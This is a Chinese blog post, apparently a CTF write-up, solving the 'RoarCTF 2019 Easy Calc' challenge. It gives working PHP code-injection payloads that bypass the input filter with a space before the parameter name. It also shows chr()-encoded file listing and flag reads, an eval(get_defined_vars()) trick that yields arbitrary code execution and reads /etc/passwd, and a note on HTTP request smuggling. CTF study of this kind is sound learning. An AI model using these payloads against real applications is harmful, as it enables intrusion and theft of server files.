<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="所以很简单看到是上传到calc.php里 所以直接尝试访问  所以是传一个num，然后正则匹配这些符号 尝试一下命令执行吧 &#96;?num&#x3D;system(&#x27;ls&#x27;);&#96;   查询之后发现是需要空格绕过 但是这个空格绕过和之前不一样 以前是会在system之前加空格 这次是在num之前加空格 这样服务器会认为传入的参数是 空格num ，而不是 num 。这里用到这种绕过方式是因为假">
<meta property="og:type" content="article">
<meta property="og:title" content="RoarCTF 2019-Easy Calc">
<meta property="og:url" content="http://example.com/2024/04/26/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/[RoarCTF%202019]Easy%20Calc/index.html">
<meta property="og:site_name" content="why">
<meta property="og:description" content="所以很简单看到是上传到calc.php里 所以直接尝试访问  所以是传一个num，然后正则匹配这些符号 尝试一下命令执行吧 &#96;?num&#x3D;system(&#x27;ls&#x27;);&#96;   查询之后发现是需要空格绕过 但是这个空格绕过和之前不一样 以前是会在system之前加空格 这次是在num之前加空格 这样服务器会认为传入的参数是 空格num ，而不是 num 。这里用到这种绕过方式是因为假">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406131914192.png">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406131914193.png">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406131914194.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/direct/50e93170372c4fbf9e09ad41d6f5909d.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/direct/7aacafeccdf94541a6b70abbb639c728.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/direct/3e1382cdd0e14e2ab9a8582e68920b4f.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/direct/da31f71647244b56aad12e09678180b5.png#pic_center">
<meta property="article:published_time" content="2024-04-26T11:16:29.000Z">
<meta property="article:modified_time" content="2024-06-21T14:00:21.388Z">
<meta property="article:author" content="why">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406131914192.png">


<link rel="canonical" href="http://example.com/2024/04/26/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/[RoarCTF%202019]Easy%20Calc/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2024/04/26/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/[RoarCTF%202019]Easy%20Calc/","path":"2024/04/26/buu刷题集-web/[RoarCTF 2019]Easy Calc/","title":"RoarCTF 2019-Easy Calc"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>RoarCTF 2019-Easy Calc | why</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">why</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">疯疯癫癫的小辣鸡</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%90%8C%E7%90%86%E6%9F%A5%E7%9C%8B%E6%A0%B9%E7%9B%AE%E5%BD%95%E4%B8%8B%E7%9A%84%E6%96%87%E4%BB%B6%EF%BC%9A"><span class="nav-number">1.</span> <span class="nav-text">同理查看根目录下的文件：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B92-file-get-contents-%E5%87%BD%E6%95%B0"><span class="nav-number"></span> <span class="nav-text">知识点2.file_get_contents() 函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B93-url%E6%BA%A2%E5%87%BA"><span class="nav-number"></span> <span class="nav-text">知识点3.url溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8B-etc-passwd-%E6%96%87%E4%BB%B6"><span class="nav-number">1.</span> <span class="nav-text">查看 &#x2F;etc&#x2F;passwd 文件</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B94-http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81"><span class="nav-number"></span> <span class="nav-text">知识点4.http请求走私</span></a></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">why</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">117</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/04/26/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/[RoarCTF%202019]Easy%20Calc/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="why">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="why">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="RoarCTF 2019-Easy Calc | why">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          RoarCTF 2019-Easy Calc
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-04-26 19:16:29" itemprop="dateCreated datePublished" datetime="2024-04-26T19:16:29+08:00">2024-04-26</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-06-21 22:00:21" itemprop="dateModified" datetime="2024-06-21T22:00:21+08:00">2024-06-21</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406131914192.png" alt="image-20240427153522480"></p>
<p>所以很简单看到是上传到calc.php里</p>
<p>所以直接尝试访问</p>
<p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406131914193.png" alt="image-20240427160135413"></p>
<p>所以是传一个num，然后正则匹配这些符号</p>
<p>尝试一下命令执行吧</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">`?num=system(&#x27;ls&#x27;);`</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406131914194.png" alt="image-20240427161140782"></p>
<p>查询之后发现是需要空格绕过</p>
<p>但是这个空格绕过和之前不一样</p>
<p>以前是会在system之前加空格</p>
<p>这次是在num之前加空格</p>
<p>这样服务器会认为传入的参数是 空格num ，而不是 num 。这里用到这种绕过方式是因为假定服务器只对 num 参数做检测，而对于其他参数不做检测。</p>
<p>当 空格num 参数传入到后端，被 PHP 代码处理时，会被去除多余空格及特殊字符：如空格、制表符、回车换行符以及某些特殊字符等。这样一来仍然是 num 参数了。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">payload:calc.php? num=var_dump(scandir(current(localeconv())));</span><br></pre></td></tr></table></figure>

<p>查看当前目录下的文件<br>localeconv() 函数返回当前设置的地区的格式化信息，包括货币符号、小数点符号等。它返回一个数组，其中包含了与当前地区相关的格式化参数，该函数返回的第一个元素的值通常是小数点 “.” 。<br>current() 函数用于获取数组中的当前元素的值。在这里，它用于获取 localeconv() 函数返回的数组的第一个元素的值，即一个小数点。<br>scandir() 函数用于获取指定目录中的文件和文件夹列表。它接受一个路径作为参数，并返回一个包含指定目录中所有文件和文件夹的数组。scandir(“.”) 表示获取当前目录下的文件列表。<br>最后使用 var_dump() 函数将该列表输出到页面上。</p>
<p>但其实这里可以更简单：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">calc.php? num=var_dump(scandir(chr(46)));</span><br></pre></td></tr></table></figure>

<p>46 是 “.” 的 ASCII 码值，返回结果：</p>
<p>因为可以有参数嘛。用 chr() 函数将数字变为字符。</p>
<h4 id="同理查看根目录下的文件："><a href="#同理查看根目录下的文件：" class="headerlink" title="同理查看根目录下的文件："></a>同理查看根目录下的文件：</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">calc.php? num=var_dump(scandir(chr(47)));</span><br></pre></td></tr></table></figure>

<p>47 是 “&#x2F;” 的 ASCII 码值</p>
<p><img src="https://img-blog.csdnimg.cn/direct/50e93170372c4fbf9e09ad41d6f5909d.png#pic_center" alt="在这里插入图片描述"></p>
<p>找到&#x2F;f1aag这个文件</p>
<p>查看 &#x2F;f1agg 文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103));</span><br></pre></td></tr></table></figure>



<h3 id="知识点2-file-get-contents-函数"><a href="#知识点2-file-get-contents-函数" class="headerlink" title="知识点2.file_get_contents() 函数"></a>知识点2.file_get_contents() 函数</h3><p>把整个文件读入一个字符串中。</p>
<p>chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)</p>
<p>分别是 ‘&#x2F;’ ‘f’ ‘1’ ‘a’ ‘g’ ‘g’ 的 ASCII 值转字符，‘.’ 用作字符串连接。每一个 chr() 函数返回的结果由于是字符，所以自带了一对引号，不需要额外再加。</p>
<p><img src="https://img-blog.csdnimg.cn/direct/7aacafeccdf94541a6b70abbb639c728.png#pic_center" alt="在这里插入图片描述"></p>
<h3 id="知识点3-url溢出"><a href="#知识点3-url溢出" class="headerlink" title="知识点3.url溢出"></a>知识点3.url溢出</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">? num=1;eval(end(pos(get_defined_vars())))&amp;nss=phpinfo();&amp;get_defined_vars()</span><br></pre></td></tr></table></figure>

<p>返回由所有已定义变量所组成的数组，会返回 _GET , _POST , _COOKIE , _FILES 全局变量的值，返回数组顺序为 get-&gt;post-&gt;cookie-&gt;files 。</p>
<p>current()：返回数组中的当前单元，初始指向插入到数组中的第一个单元，也就是会返回 $_GET 变量的数组值。</p>
<p>end() : 将内部指针指向数组中的最后一个元素，并输出。即新加入的参数 nss 。</p>
<p>最后由 eval() 函数执行，使得 get 方式的参数 nss 生效。</p>
<p>这样的话就可以再利用 nss 传参了，由于代码只对 num 参数的值做了过滤，因此 nss 参数理论上可以造成任意代码执行。</p>
<p>这样可以看到phpinfo，找到disable_function函数</p>
<h4 id="查看-etc-passwd-文件"><a href="#查看-etc-passwd-文件" class="headerlink" title="查看 &#x2F;etc&#x2F;passwd 文件"></a>查看 &#x2F;etc&#x2F;passwd 文件</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">? num=1;eval(end(pos(get_defined_vars())))&amp;nss=include(&quot;/etc/passwd&quot;);</span><br></pre></td></tr></table></figure>

<p>输出结果：</p>
<p><img src="https://img-blog.csdnimg.cn/direct/3e1382cdd0e14e2ab9a8582e68920b4f.png#pic_center" alt="在这里插入图片描述"></p>
<h3 id="知识点4-http请求走私"><a href="#知识点4-http请求走私" class="headerlink" title="知识点4.http请求走私"></a>知识点4.http请求走私</h3><p><img src="https://img-blog.csdnimg.cn/direct/da31f71647244b56aad12e09678180b5.png#pic_center" alt="在这里插入图片描述"></p>
<p>大致原理就是使用了两个 Content-Length 头，使得前端无法识别，直接将整个包完全发给了后端。但这样还是要接受后端的黑名单过滤，所以 num 传参还是不能为所欲为。</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/03/19/hello-world/" rel="prev" title="Hello World">
                  <i class="fa fa-angle-left"></i> Hello World
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/04/28/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/HCTF-2018-admin/" rel="next" title="[HCTF 2018]admin">
                  [HCTF 2018]admin <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">why</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
